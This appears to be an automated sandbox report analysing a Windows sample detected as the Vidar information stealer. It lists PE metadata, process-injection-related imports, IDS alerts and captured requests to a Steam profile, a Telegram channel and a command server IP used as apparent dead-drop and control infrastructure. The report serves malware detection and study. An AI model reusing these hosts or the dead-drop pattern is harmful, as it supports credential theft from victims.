                                                                                                                                                                      mov eax, FE8CD1E8h
                                                                                                                                                                      push dword ptr [ebx+eax+75h]
                                                                                                                                                                      add dword ptr [eax+00000000h], edi

                                                                                                                                                                      Rich Headers

                                                                                                                                                                      Programming Language:
                                                                                                                                                                      • [C++] VS2010 build 30319
                                                                                                                                                                      • [ASM] VS2010 build 30319
                                                                                                                                                                      • [ C ] VS2010 build 30319
                                                                                                                                                                      • [ C ] VS2008 SP1 build 30729
                                                                                                                                                                      • [IMP] VS2008 SP1 build 30729
                                                                                                                                                                      • [LNK] VS2010 build 30319

                                                                                                                                                                      Data Directories

                                                                                                                                                                      NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_IMPORT0x3bb800xc8.rdata
                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x2700000xb0.rsrc
                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x2710000x3338.reloc
                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_IAT0x300000x290.rdata
                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                                                      Sections

                                                                                                                                                                      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                      .text0x10000x2e3040x2e4006b77308b876d8e37d6342ce65903a9c5False0.5125052787162162Matlab v4 mat-file (little endian) , numeric, rows 4387547, columns 43875606.459615185396822IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                      .rdata0x300000xc99e0xca00a8d553db2a2776dfd97934ef96d30060False0.6050239789603961data6.366577021451741IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                      .data0x3d0000x23206c0x2000079770914926047f0864a61e29dda9f6dunknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                      .rsrc0x2700000xb00x2004b7115c48fa1ed45d7fd2da2c2df5abbFalse0.279296875data4.097217764488071IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                      .reloc0x2710000x49b60x4a001c5071c930c30567d2f765a7544a7835False0.5681482263513513data5.494938881976661IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                                                                                      Resources

                                                                                                                                                                      NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                                      RT_MANIFEST0x2700580x56ASCII text, with CRLF line terminatorsEnglishUnited States1.0232558139534884

                                                                                                                                                                      Imports

                                                                                                                                                                      DLLImport
                                                                                                                                                                      msvcrt.dllstrncpy, malloc, _wtoi64, ??_V@YAXPAX@Z, atexit, memchr, strcpy_s, strchr, strtok_s, ??_U@YAPAXI@Z, _time64, srand, rand, memmove, __CxxFrameHandler3
                                                                                                                                                                      KERNEL32.dllGetEnvironmentStringsW, FreeEnvironmentStringsW, GetModuleFileNameA, HeapSize, WideCharToMultiByte, IsValidCodePage, GetOEMCP, ExitProcess, SetCriticalSectionSpinCount, FlsAlloc, HeapAlloc, GetCurrentProcess, HeapFree, VirtualFree, GetProcessHeap, WriteFile, VirtualAllocExNuma, Sleep, ReadFile, CreateFileW, lstrcatA, MultiByteToWideChar, GetTempPathW, GetLastError, lstrcmpiA, GetProcAddress, VirtualAlloc, GlobalMemoryStatusEx, ConvertDefaultLocale, lstrcmpiW, GetModuleHandleA, VirtualProtect, CloseHandle, lstrlenA, FreeLibrary, GetThreadContext, SetThreadContext, ReadProcessMemory, SetHandleCount, WriteProcessMemory, VirtualQueryEx, OpenProcess, GetComputerNameA, FileTimeToSystemTime, WaitForSingleObject, GetDriveTypeA, CreateProcessA, CreateDirectoryA, GetLogicalDriveStringsA, CreateThread, CreateFileA, GetFileSize, SetFilePointer, MapViewOfFile, UnmapViewOfFile, lstrcpynA, SystemTimeToFileTime, GetTickCount, GetLocalTime, CreateFileMappingA, GetFileInformationByHandle, lstrcpyA, GetCPInfo, HeapSetInformation, GetCommandLineA, HeapReAlloc, GetLocaleInfoW, LoadLibraryW, InterlockedExchange, SetConsoleCtrlHandler, IsProcessorFeaturePresent, GetCurrentThread, InterlockedDecrement, GetACP, GetCurrentThreadId, SetLastError, GetFileType, QueryPerformanceCounter, GetStartupInfoW, GetCurrentProcessId, GetSystemTimeAsFileTime, LCMapStringW, VirtualAllocEx, GetStringTypeW, InterlockedIncrement, TlsFree, RaiseException, IsValidLocale, EnumSystemLocalesA, GetLocaleInfoA, GetUserDefaultLCID, TlsSetValue, TlsGetValue, TlsAlloc, GetModuleFileNameW, GetStdHandle, GetModuleHandleW, HeapDestroy, TerminateProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, EncodePointer, DecodePointer, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, LeaveCriticalSection, FatalAppExitA, EnterCriticalSection, RtlUnwind, HeapCreate
                                                                                                                                                                      USER32.dllGetDesktopWindow, OpenInputDesktop, wsprintfW, IsDialogMessageW, MessageBoxA, GetWindowLongW, ReleaseDC, GetWindowContextHelpId, GetCursorPos, SetThreadDesktop, RegisterClassW, IsWindowVisible, CharToOemA
                                                                                                                                                                      GDI32.dllCreateDCA, GetDeviceCaps
                                                                                                                                                                      ADVAPI32.dllRegGetValueA, RegOpenKeyExA, GetUserNameA, GetCurrentHwProfileA
                                                                                                                                                                      SHELL32.dllSHFileOperationA
                                                                                                                                                                      ole32.dllCoInitializeSecurity, CoSetProxyBlanket, CoCreateInstance, CoInitializeEx
                                                                                                                                                                      OLEAUT32.dllSysAllocString, SysFreeString, VariantClear, VariantInit
                                                                                                                                                                      SHLWAPI.dll

                                                                                                                                                                      Possible Origin

                                                                                                                                                                      Language of compilation systemCountry where language is spokenMap
                                                                                                                                                                      EnglishUnited States

                                                                                                                                                                      Network Behavior

                                                                                                                                                                      Suricata IDS Alerts

                                                                                                                                                                      TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                                      2024-10-20T08:35:25.223918+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.44974065.109.142.154443TCP

                                                                                                                                                                      Network Port Distribution

                                                                                                                                                                      TCP Packets

                                                                                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                      Oct 20, 2024 08:35:20.985528946 CEST49737443192.168.2.4104.102.49.254
                                                                                                                                                                      Oct 20, 2024 08:35:20.985580921 CEST44349737104.102.49.254192.168.2.4
                                                                                                                                                                      Oct 20, 2024 08:35:20.985835075 CEST49737443192.168.2.4104.102.49.254
                                                                                                                                                                      Oct 20, 2024 08:35:21.006531954 CEST49737443192.168.2.4104.102.49.254
                                                                                                                                                                      Oct 20, 2024 08:35:21.006556034 CEST44349737104.102.49.254192.168.2.4
                                                                                                                                                                      Oct 20, 2024 08:35:22.951739073 CEST44349737104.102.49.254192.168.2.4
                                                                                                                                                                      Oct 20, 2024 08:35:22.951805115 CEST49737443192.168.2.4104.102.49.254
                                                                                                                                                                      Oct 20, 2024 08:35:23.002553940 CEST49737443192.168.2.4104.102.49.254
                                                                                                                                                                      Oct 20, 2024 08:35:23.002571106 CEST44349737104.102.49.254192.168.2.4
                                                                                                                                                                      Oct 20, 2024 08:35:23.002829075 CEST44349737104.102.49.254192.168.2.4
                                                                                                                                                                      Oct 20, 2024 08:35:23.002994061 CEST49737443192.168.2.4104.102.49.254
                                                                                                                                                                      Oct 20, 2024 08:35:23.008577108 CEST49737443192.168.2.4104.102.49.254
                                                                                                                                                                      Oct 20, 2024 08:35:23.055437088 CEST44349737104.102.49.254192.168.2.4
                                                                                                                                                                      Oct 20, 2024 08:35:23.728607893 CEST44349737104.102.49.254192.168.2.4
                                                                                                                                                                      Oct 20, 2024 08:35:23.728631020 CEST44349737104.102.49.254192.168.2.4
                                                                                                                                                                      Oct 20, 2024 08:35:23.728801966 CEST49737443192.168.2.4104.102.49.254
                                                                                                                                                                      Oct 20, 2024 08:35:23.728801966 CEST49737443192.168.2.4104.102.49.254
                                                                                                                                                                      Oct 20, 2024 08:35:23.728826046 CEST44349737104.102.49.254192.168.2.4
                                                                                                                                                                      Oct 20, 2024 08:35:23.728884935 CEST49737443192.168.2.4104.102.49.254
                                                                                                                                                                      Oct 20, 2024 08:35:23.748356104 CEST44349737104.102.49.254192.168.2.4
                                                                                                                                                                      Oct 20, 2024 08:35:23.748373985 CEST44349737104.102.49.254192.168.2.4
                                                                                                                                                                      Oct 20, 2024 08:35:23.748455048 CEST49737443192.168.2.4104.102.49.254
                                                                                                                                                                      Oct 20, 2024 08:35:23.748464108 CEST44349737104.102.49.254192.168.2.4
                                                                                                                                                                      Oct 20, 2024 08:35:23.748507023 CEST49737443192.168.2.4104.102.49.254
                                                                                                                                                                      Oct 20, 2024 08:35:23.760011911 CEST44349737104.102.49.254192.168.2.4
                                                                                                                                                                      Oct 20, 2024 08:35:23.760090113 CEST49737443192.168.2.4104.102.49.254
                                                                                                                                                                      Oct 20, 2024 08:35:23.768870115 CEST44349737104.102.49.254192.168.2.4
                                                                                                                                                                      Oct 20, 2024 08:35:23.768918991 CEST44349737104.102.49.254192.168.2.4
                                                                                                                                                                      Oct 20, 2024 08:35:23.768928051 CEST49737443192.168.2.4104.102.49.254
                                                                                                                                                                      Oct 20, 2024 08:35:23.768970966 CEST49737443192.168.2.4104.102.49.254
                                                                                                                                                                      Oct 20, 2024 08:35:23.770070076 CEST49737443192.168.2.4104.102.49.254
                                                                                                                                                                      Oct 20, 2024 08:35:23.770078897 CEST44349737104.102.49.254192.168.2.4
                                                                                                                                                                      Oct 20, 2024 08:35:23.790509939 CEST49740443192.168.2.465.109.142.154
                                                                                                                                                                      Oct 20, 2024 08:35:23.790555000 CEST4434974065.109.142.154192.168.2.4
                                                                                                                                                                      Oct 20, 2024 08:35:23.790622950 CEST49740443192.168.2.465.109.142.154
                                                                                                                                                                      Oct 20, 2024 08:35:23.790888071 CEST49740443192.168.2.465.109.142.154
                                                                                                                                                                      Oct 20, 2024 08:35:23.790908098 CEST4434974065.109.142.154192.168.2.4
                                                                                                                                                                      Oct 20, 2024 08:35:25.223642111 CEST4434974065.109.142.154192.168.2.4
                                                                                                                                                                      Oct 20, 2024 08:35:25.223917961 CEST49740443192.168.2.465.109.142.154
                                                                                                                                                                      Oct 20, 2024 08:35:25.227292061 CEST49740443192.168.2.465.109.142.154
                                                                                                                                                                      Oct 20, 2024 08:35:25.227303028 CEST4434974065.109.142.154192.168.2.4
                                                                                                                                                                      Oct 20, 2024 08:35:25.227534056 CEST4434974065.109.142.154192.168.2.4
                                                                                                                                                                      Oct 20, 2024 08:35:25.227597952 CEST49740443192.168.2.465.109.142.154
                                                                                                                                                                      Oct 20, 2024 08:35:25.227890968 CEST49740443192.168.2.465.109.142.154
                                                                                                                                                                      Oct 20, 2024 08:35:25.275440931 CEST4434974065.109.142.154192.168.2.4
                                                                                                                                                                      Oct 20, 2024 08:35:26.036815882 CEST4434974065.109.142.154192.168.2.4
                                                                                                                                                                      Oct 20, 2024 08:35:26.036871910 CEST4434974065.109.142.154192.168.2.4
                                                                                                                                                                      Oct 20, 2024 08:35:26.037066936 CEST49740443192.168.2.465.109.142.154
                                                                                                                                                                      Oct 20, 2024 08:35:26.037128925 CEST49740443192.168.2.465.109.142.154
                                                                                                                                                                      Oct 20, 2024 08:35:26.037146091 CEST4434974065.109.142.154192.168.2.4
                                                                                                                                                                      Oct 20, 2024 08:35:26.053841114 CEST49742443192.168.2.4149.154.167.99
                                                                                                                                                                      Oct 20, 2024 08:35:26.053865910 CEST44349742149.154.167.99192.168.2.4
                                                                                                                                                                      Oct 20, 2024 08:35:26.053931952 CEST49742443192.168.2.4149.154.167.99
                                                                                                                                                                      Oct 20, 2024 08:35:26.054133892 CEST49742443192.168.2.4149.154.167.99
                                                                                                                                                                      Oct 20, 2024 08:35:26.054147005 CEST44349742149.154.167.99192.168.2.4
                                                                                                                                                                      Oct 20, 2024 08:35:27.125178099 CEST44349742149.154.167.99192.168.2.4
                                                                                                                                                                      Oct 20, 2024 08:35:27.125292063 CEST49742443192.168.2.4149.154.167.99
                                                                                                                                                                      Oct 20, 2024 08:35:27.157351017 CEST49742443192.168.2.4149.154.167.99
                                                                                                                                                                      Oct 20, 2024 08:35:27.157367945 CEST44349742149.154.167.99192.168.2.4
                                                                                                                                                                      Oct 20, 2024 08:35:27.157695055 CEST44349742149.154.167.99192.168.2.4
                                                                                                                                                                      Oct 20, 2024 08:35:27.157772064 CEST49742443192.168.2.4149.154.167.99
                                                                                                                                                                      Oct 20, 2024 08:35:27.159262896 CEST49742443192.168.2.4149.154.167.99
                                                                                                                                                                      Oct 20, 2024 08:35:27.203414917 CEST44349742149.154.167.99192.168.2.4
                                                                                                                                                                      Oct 20, 2024 08:35:27.468785048 CEST44349742149.154.167.99192.168.2.4
                                                                                                                                                                      Oct 20, 2024 08:35:27.468821049 CEST44349742149.154.167.99192.168.2.4
                                                                                                                                                                      Oct 20, 2024 08:35:27.468842983 CEST49742443192.168.2.4149.154.167.99
                                                                                                                                                                      Oct 20, 2024 08:35:27.468873978 CEST49742443192.168.2.4149.154.167.99
                                                                                                                                                                      Oct 20, 2024 08:35:27.469053030 CEST49742443192.168.2.4149.154.167.99
                                                                                                                                                                      Oct 20, 2024 08:35:27.469072104 CEST44349742149.154.167.99192.168.2.4

                                                                                                                                                                      UDP Packets

                                                                                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                      Oct 20, 2024 08:35:20.972177029 CEST5271453192.168.2.41.1.1.1
                                                                                                                                                                      Oct 20, 2024 08:35:20.980287075 CEST53527141.1.1.1192.168.2.4
                                                                                                                                                                      Oct 20, 2024 08:35:26.046403885 CEST6394353192.168.2.41.1.1.1
                                                                                                                                                                      Oct 20, 2024 08:35:26.053251028 CEST53639431.1.1.1192.168.2.4
                                                                                                                                                                      Oct 20, 2024 08:35:27.835844994 CEST5679853192.168.2.41.1.1.1
                                                                                                                                                                      Oct 20, 2024 08:35:27.844980001 CEST53567981.1.1.1192.168.2.4
                                                                                                                                                                      Oct 20, 2024 08:35:30.949796915 CEST53582321.1.1.1192.168.2.4

                                                                                                                                                                      DNS Queries

                                                                                                                                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                      Oct 20, 2024 08:35:20.972177029 CEST192.168.2.41.1.1.10x166aStandard query (0)steamcommunity.comA (IP address)IN (0x0001)false
                                                                                                                                                                      Oct 20, 2024 08:35:26.046403885 CEST192.168.2.41.1.1.10x665dStandard query (0)t.meA (IP address)IN (0x0001)false
                                                                                                                                                                      Oct 20, 2024 08:35:27.835844994 CEST192.168.2.41.1.1.10x5e77Standard query (0)cowod.hopto.orgA (IP address)IN (0x0001)false

                                                                                                                                                                      DNS Answers

                                                                                                                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                      Oct 20, 2024 08:35:20.980287075 CEST1.1.1.1192.168.2.40x166aNo error (0)steamcommunity.com104.102.49.254A (IP address)IN (0x0001)false
                                                                                                                                                                      Oct 20, 2024 08:35:26.053251028 CEST1.1.1.1192.168.2.40x665dNo error (0)t.me149.154.167.99A (IP address)IN (0x0001)false

                                                                                                                                                                      HTTP Request Dependency Graph

                                                                                                                                                                      • steamcommunity.com
                                                                                                                                                                      • 65.109.142.154
                                                                                                                                                                      • t.me

                                                                                                                                                                      HTTPS Proxied Packets

                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                      0192.168.2.449737104.102.49.2544437336C:\Users\user\Desktop\aZm1EZ2IYr.exe
                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                      2024-10-20 06:35:23 UTC119OUTGET /profiles/76561199786602107 HTTP/1.1
                                                                                                                                                                      Host: steamcommunity.com
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                      2024-10-20 06:35:23 UTC1917INHTTP/1.1 200 OK
                                                                                                                                                                      Server: nginx
                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                      Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.cloudflare.steamstatic.com/ https://cdn.cloudflare.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.cloudflare.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https:// [TRUNCATED]
                                                                                                                                                                      Expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                      Date: Sun, 20 Oct 2024 06:35:23 GMT
                                                                                                                                                                      Content-Length: 35803
                                                                                                                                                                      Connection: close
                                                                                                                                                                      Set-Cookie: sessionid=90a529e697100d7490088596; Path=/; Secure; SameSite=None
                                                                                                                                                                      Set-Cookie: steamCountry=US%7C0e3d185a3e106e73b244decdec33a0ea; Path=/; Secure; HttpOnly; SameSite=None
                                                                                                                                                                      2024-10-20 06:35:23 UTC14467INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 20 72 65 73 70 6f 6e 73 69 76 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0d 0a 09 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 31 37 31 61 32 31 22 3e 0d 0a 09 09 3c
                                                                                                                                                                      Data Ascii: <!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"><
                                                                                                                                                                      2024-10-20 06:35:23 UTC16384INData Raw: 09 09 09 48 6f 6d 65 09 09 09 09 09 09 09 09 09 09 09 3c 2f 61 3e 0d 0a 09 09 09 09 09 09 09 09 09 09 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 73 75 62 6d 65 6e 75 69 74 65 6d 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 65 61 6d 63 6f 6d 6d 75 6e 69 74 79 2e 63 6f 6d 2f 64 69 73 63 75 73 73 69 6f 6e 73 2f 22 3e 0d 0a 09 09 09 09 09 09 44 69 73 63 75 73 73 69 6f 6e 73 09 09 09 09 09 09 09 09 09 09 09 3c 2f 61 3e 0d 0a 09 09 09 09 09 09 09 09 09 09 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 73 75 62 6d 65 6e 75 69 74 65 6d 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 65 61 6d 63 6f 6d 6d 75 6e 69 74 79 2e 63 6f 6d 2f 77 6f 72 6b 73 68 6f 70 2f 22 3e 0d 0a 09 09 09 09 09 09 57 6f 72 6b 73 68 6f 70 09 09 09 09 09 09 09 09 09 09 09 3c 2f 61
                                                                                                                                                                      Data Ascii: Home</a><a class="submenuitem" href="https://steamcommunity.com/discussions/">Discussions</a><a class="submenuitem" href="https://steamcommunity.com/workshop/">Workshop</a
                                                                                                                                                                      2024-10-20 06:35:23 UTC3768INData Raw: 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 73 74 65 61 6d 73 74 61 74 69 63 2e 63 6f 6d 2f 66 65 66 34 39 65 37 66 61 37 65 31 39 39 37 33 31 30 64 37 30 35 62 32 61 36 31 35 38 66 66 38 64 63 31 63 64 66 65 62 5f 66 75 6c 6c 2e 6a 70 67 22 3e 0d 0a 09 09 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 09 3c 2f 64 69 76 3e 0d 0a 0d 0a 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 72 6f 66 69 6c 65 5f 68 65 61 64 65 72 5f 62 61 64 67 65 69 6e 66 6f 22 3e 0d 0a 09 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 72 6f 66 69 6c 65 5f 68 65 61 64 65 72 5f 62 61 64 67 65 69 6e 66 6f 5f 62 61 64 67 65 5f 61 72 65 61 22 3e 0d 0a 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 3c 61 20 64 61 74 61 2d 70 61 6e 65 6c 3d 22 7b 26 71 75 6f 74 3b 66 6f 63
                                                                                                                                                                      Data Ascii: s.cloudflare.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg"></div></div><div class="profile_header_badgeinfo"><div class="profile_header_badgeinfo_badge_area"><a data-panel="{&quot;foc


                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                      1192.168.2.44974065.109.142.1544437336C:\Users\user\Desktop\aZm1EZ2IYr.exe
                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                      2024-10-20 06:35:25 UTC187OUTGET / HTTP/1.1
                                                                                                                                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                                                                      Host: 65.109.142.154
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      Cache-Control: no-cache


                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                      2192.168.2.449742149.154.167.994437336C:\Users\user\Desktop\aZm1EZ2IYr.exe
                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                      2024-10-20 06:35:27 UTC86OUTGET /lpnjoke HTTP/1.1
                                                                                                                                                                      Host: t.me
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      Cache-Control: no-cache


                                                                                                                                                                      Statistics

                                                                                                                                                                      CPU Usage

                                                                                                                                                                      Click to jump to process

                                                                                                                                                                      Memory Usage

                                                                                                                                                                      Click to jump to process

                                                                                                                                                                      High Level Behavior Distribution

                                                                                                                                                                      Click to dive into process behavior distribution

                                                                                                                                                                      Behavior

                                                                                                                                                                      Click to jump to process

                                                                                                                                                                      System Behavior

                                                                                                                                                                      General

                                                                                                                                                                      Target ID:0
                                                                                                                                                                      Start time:02:34:56
                                                                                                                                                                      Start date:20/10/2024
                                                                                                                                                                      Path:C:\Users\user\Desktop\aZm1EZ2IYr.exe
                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                      Commandline:"C:\Users\user\Desktop\aZm1EZ2IYr.exe"
                                                                                                                                                                      Imagebase:0x180000
                                                                                                                                                                      File size:392'704 bytes
                                                                                                                                                                      MD5 hash:1E1D5412616216FD90EA3CB6A87353DB
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Yara matches:
                                                                                                                                                                      • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000000.00000002.2042710572.00000000001B0000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                                                                                      • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.2042710572.00000000001B0000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                                                                                      • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000000.00000000.1668857258.00000000001B0000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                                                                                      • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000000.1668857258.00000000001B0000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                                                                                      • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                                                                                      Reputation:low
                                                                                                                                                                      Has exited:true

                                                                                                                                                                      General

                                                                                                                                                                      Target ID:6
                                                                                                                                                                      Start time:02:35:26
                                                                                                                                                                      Start date:20/10/2024
                                                                                                                                                                      Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                      Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 7336 -s 2220
                                                                                                                                                                      Imagebase:0xb70000
                                                                                                                                                                      File size:483'680 bytes
                                                                                                                                                                      MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Reputation:high
                                                                                                                                                                      Has exited:true

                                                                                                                                                                      General

                                                                                                                                                                      Target ID:8
                                                                                                                                                                      Start time:02:35:27
                                                                                                                                                                      Start date:20/10/2024
                                                                                                                                                                      Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                      Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 7336 -s 2384
                                                                                                                                                                      Imagebase:0xb70000
                                                                                                                                                                      File size:483'680 bytes
                                                                                                                                                                      MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Reputation:high
                                                                                                                                                                      Has exited:true

                                                                                                                                                                      Disassembly

                                                                                                                                                                      Reset < >

                                                                                                                                                                        Execution Graph

                                                                                                                                                                        Execution Coverage:13.4%
                                                                                                                                                                        Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                        Signature Coverage:4.9%
                                                                                                                                                                        Total number of Nodes:2000
                                                                                                                                                                        Total number of Limit Nodes:22
